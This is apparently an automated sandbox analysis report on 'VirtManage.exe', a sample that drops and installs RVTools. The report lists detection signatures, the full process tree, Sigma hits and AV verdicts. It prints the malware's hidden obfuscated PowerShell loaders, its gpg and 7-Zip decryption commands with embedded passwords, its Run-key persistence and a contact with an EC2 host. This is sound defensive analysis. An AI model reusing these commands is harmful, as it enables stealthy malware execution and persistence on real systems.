Windows Analysis Report
VirtManage.exe

Overview

General Information

Sample name: VirtManage.exe
Analysis ID: 1632487
MD5: b587a6af7fd86eeb42425913b8d73d47
SHA1: ad388fa1cc0bec1fc45b30a460c53c56789bb11d
SHA256: c600dd34854aa5c6c97ed8c1c92d28034d661652b4d892d223b6805a4e864622
Tags: exe, FORTUNEPRINTCENTRELIMITED, user-SquiblydooBlog

Detection

Score: 42
Range: 0 - 100
Confidence: 100%

Compliance

Score: 34
Range: 0 - 100

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
.NET source code contains a domain name check
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • VirtManage.exe (PID: 6792 cmdline: "C:\Users\user\Desktop\VirtManage.exe" MD5: B587A6AF7FD86EEB42425913B8D73D47)
    • gpg.exe (PID: 3528 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\5FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 7036 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\1FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 4148 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\2FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7za.exe (PID: 4256 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24 MD5: C58A4193BAC738B1A88ACAD9C6A57356)
      • conhost.exe (PID: 4380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3376 cmdline: msiexec.exe /i "C:\ProgramData\Microsoft\WindowsUpdate24\RVTools.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • gpg.exe (PID: 5800 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\Cert.txt --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\3FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • w32tm.exe (PID: 6884 cmdline: w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com MD5: E55B6A057FDDD35A7380FB2C6811A8EC)
      • conhost.exe (PID: 2648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 1264 cmdline: w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com MD5: 81A82132737224D324A3E8DA993E2FB5)
    • gpg.exe (PID: 2904 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\4FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7za.exe (PID: 5412 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24 MD5: C58A4193BAC738B1A88ACAD9C6A57356)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1960 cmdline: sc config msdtc start= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7132 cmdline: sc config msdtc obj= "LocalSystem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • oleview.exe (PID: 5724 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe MD5: ADB9B72679B88DDE1749E0A438222156)
      • powershell.exe (PID: 5872 cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • csc.exe (PID: 5812 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 5652 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA360.tmp" "c:\Users\user\AppData\Local\Temp\b0okydtw\CSCB61681A6E66748218243D78918A832B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • whoami.exe (PID: 7368 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
  • msiexec.exe (PID: 5700 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6964 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding FB5755C4D12C2C80E27834E9FC6EF971 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • WmiPrvSE.exe (PID: 1324 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • oleview.exe (PID: 6672 cmdline: "C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe" MD5: ADB9B72679B88DDE1749E0A438222156)
    • powershell.exe (PID: 6556 cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5808 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
No configs have been found
No yara matches
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VirtManage.exe, ProcessId: 6792, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateOleview
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", ProcessId: 5812, ProcessName: csc.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", CommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, ParentImage: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, ParentProcessId: 5724, ParentProcessName: oleview.exe, ProcessCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ProcessId: 5872, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5872, TargetFilename: C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\system32\whoami.exe", CommandLine: "C:\Windows\system32\whoami.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\whoami.exe", ProcessId: 7368, ProcessName: whoami.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", CommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, ParentImage: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, ParentProcessId: 5724, ParentProcessName: oleview.exe, ProcessCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ProcessId: 5872, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5808, ProcessName: svchost.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", ProcessId: 5812, ProcessName: csc.exe
No Suricata rule has matched


AV Detection

Source: C:\ProgramData\Microsoft\LogUpdateWindows\aclui.dll; Avira: detection malicious, Label: TR/Redcap.dbiqq
Source: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dll; Avira: detection malicious, Label: TR/Redcap.dbiqq
Source: C:\ProgramData\Microsoft\LogUpdateWindows\aclui.dll; ReversingLabs: Detection: 66%
Source: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dll; ReversingLabs: Detection: 66%
xp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_sexp_release,gcry_sexp_release,gcry_mpi_cmp,gcry_mpi_get_flag,gcry_calloc,gpg_err_code_from_syserror,gcry_mpi_copy,gpgrt_log_error,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_release,gcry_sexp_extract_param,3_2_0046B3E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0044E530 gcry_mpi_get_flag,gcry_malloc_secure,memcpy,gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpg_err_code_from_syserror,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,3_2_0044E530
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0044E920 gcry_mpi_get_flag,gcry_mpi_get_opaque,gcry_malloc_secure,memcpy,gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpgrt_log_error,gcry_free,gcry_cipher_close,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,3_2_0044E920
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_00454B00 _gpgrt_log_assert,gcry_cipher_decrypt,gcry_md_write,memcpy,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_cipher_decrypt,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,3_2_00454B00
Source: C:\Users\user\Desktop\VirtManage.exe | EXE: msiexec.exe
Source: C:\Users\user\Desktop\VirtManage.exe | EXE: sc.exe
Source: C:\Users\user\Desktop\VirtManage.exe | EXE: w32tm.exe

Compliance

Source: C:\Users\user\Desktop\VirtManage.exe | EXE: msiexec.exe
Source: C:\Users\user\Desktop\VirtManage.exe | EXE: sc.exe
Source: C:\Users\user\Desktop\VirtManage.exe | EXE: w32tm.exe
Source: VirtManage.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\msiexec.exe | Window detected: < &Back | License Agreement | DefBannerBitmap | MsiHorizontalLine | Please take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel". | This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: VirtManage.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49759 version: TLS 1.2
